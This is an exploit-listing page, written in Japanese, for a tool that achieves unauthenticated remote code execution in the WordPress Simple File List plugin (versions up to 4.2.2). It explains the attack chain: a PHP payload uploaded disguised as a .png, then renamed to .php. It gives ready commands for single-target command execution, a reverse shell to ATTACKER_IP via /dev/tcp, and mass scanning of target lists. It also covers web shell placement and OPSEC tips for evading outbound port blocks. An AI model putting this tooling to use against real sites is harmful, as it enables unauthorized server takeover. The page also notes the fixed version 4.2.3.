Sploitus

Exploit for CVE-2025-34085 CVE-2020-36847 CVE-2025-34085

kitploit · 2026-09-01

Exploit Code

MARKDOWN127 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-0XGUNRUNNER-CVE-2025-34085
# CVE-2025-34085 — WordPress Simple File List 未認証リモートコード実行

**CVE-2025-34085** (**CVE-2020-36847** の重複)の自動エクスプロイトです。これは **WordPress Simple File List** プラグインバージョン **≤ 4.2.2** における、重大な未認証リモートコード実行脆弱性です。

> **注記:** CVE-2025-34085 は CVE-2020-36847 の重複としてMITREにより拒否されました。脆弱性は実際に存在し、バージョン4.2.3で修正されています。両方のCVE IDは同じ根本的な問題を指しています。

## 脆弱性概要

項目| 詳細  
---|---  
**CVE**|  CVE-2025-34085 / CVE-2020-36847  
**プラグイン**| Simple File List  
**影響を受けるバージョン**|  ≤ 4.2.2  
**修正バージョン**|  4.2.3  
**種別**|  無制限ファイルアップロード → 名前変更バイパス → RCE  
**CVSS**|  9.8(緊急)  
**認証**|  不要  
**最初の発見者**|  coiffeur  
**Metasploitモジュール**| `exploit/multi/http/wp_simple_file_list_rce`  
  
## 動作の仕組み

  1. **アップロード** — PHPペイロードが`.png`ファイルに偽装され、プラグインのアップロードエンドポイント(`ee-upload-engine.php`)を介してアップロードされます。アップロードエンジンは拡張子を検証しますが、画像ファイルを受け入れます。

  2. **名前変更** — プラグインの名前変更機能(`ee-file-engine.php`)は拡張子制限を**適用しません** 。攻撃者は`.png`を`.php`(または`.phtml`、`.php5`、`.php3`)に名前変更します。

  3. **実行** — 名前変更されたPHPファイルは、アップロードディレクトリ`/wp-content/uploads/simple-file-list/`でアクセス可能かつ実行可能になり、攻撃者に任意のコマンド実行を許可します。




## 必要条件

root@kitploit:~
    
    
    pip install requests colorama
    

Python 3.6以上

## 使用方法

### 単一ターゲット

root@kitploit:~
    
    
    python3 CVE-2025-34085.py -u http://target.com --cmd "id"
    

### インラインコマンドを使用した単一ターゲット(`?cmd=`パラメータなし)

root@kitploit:~
    
    
    python3 CVE-2025-34085.py -u http://target.com --cmd "bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1'" --inline
    

### 大量スキャン

各行に1つのURLを記述した`targets.txt`ファイルを作成します:

root@kitploit:~
    
    
    http://target1.com
    http://target2.com
    https://target3.com
    

root@kitploit:~
    
    
    python3 CVE-2025-34085.py --cmd "id"
    

### 引数

> **ヒント:** リバースシェルが必要な場合や、ターゲットにクエリ文字列フィルタリングがある場合は`--inline`を使用してください。`--inline`を使用しない場合、エクスプロイトは`?cmd=`を介してコマンドを受け付けるウェブシェルを配置します。

## 出力

成功したエクスプロイトは`vuln.txt`に記録されます:

root@kitploit:~
    
    
    http://target.com | http://target.com/wp-content/uploads/simple-file-list/shell.php | uid=33(www-data) gid=33(www-data)
    

## OSCP向けOPSECノート

  * エクスプロイトはPHPファイルをディスクにアップロードします — これにより**痕跡が残ります**
  * ウェブシェルは`/wp-content/uploads/simple-file-list/<random>.php`に残ります
  * 成功したアップロードはローカルの`vuln.txt`に記録されます — レポートに役立ちます
  * 試験では、`--inline`をリバースシェルと併用して、`?cmd=`を持つ永続的なウェブシェルを残さないようにしてください
  * ターゲットが送信ポートをブロックしている場合は、一般的に許可されているポート(80、443、53)を試してください



## 参考情報

  * NVD — CVE-2025-34085
  * NVD — CVE-2020-36847
  * Wordfence Advisory
  * Metasploit Module
  * Plugin Changelog (Patch)
  * Exploit-DB #48979
  * Original PoC by coiffeur — Exploit-DB #48349



## 修復方法

Simple File Listプラグインを**バージョン4.2.3以上** にアップグレードしてください。

## 免責事項

このツールは**認可されたペネトレーションテストおよび教育目的のみ** を対象としています。許可なくコンピュータシステムにアクセスすることは違法です。テスト前には必ず適切な許可を取得してください。

## クレジット

  * **脆弱性の最初の発見:** coiffeur
  * **元のエクスプロイトスクリプト:** 0xgh057r3c0n, B1ack4sh (Ashwesker)
  * **メンテナンス:** 0xgunrunner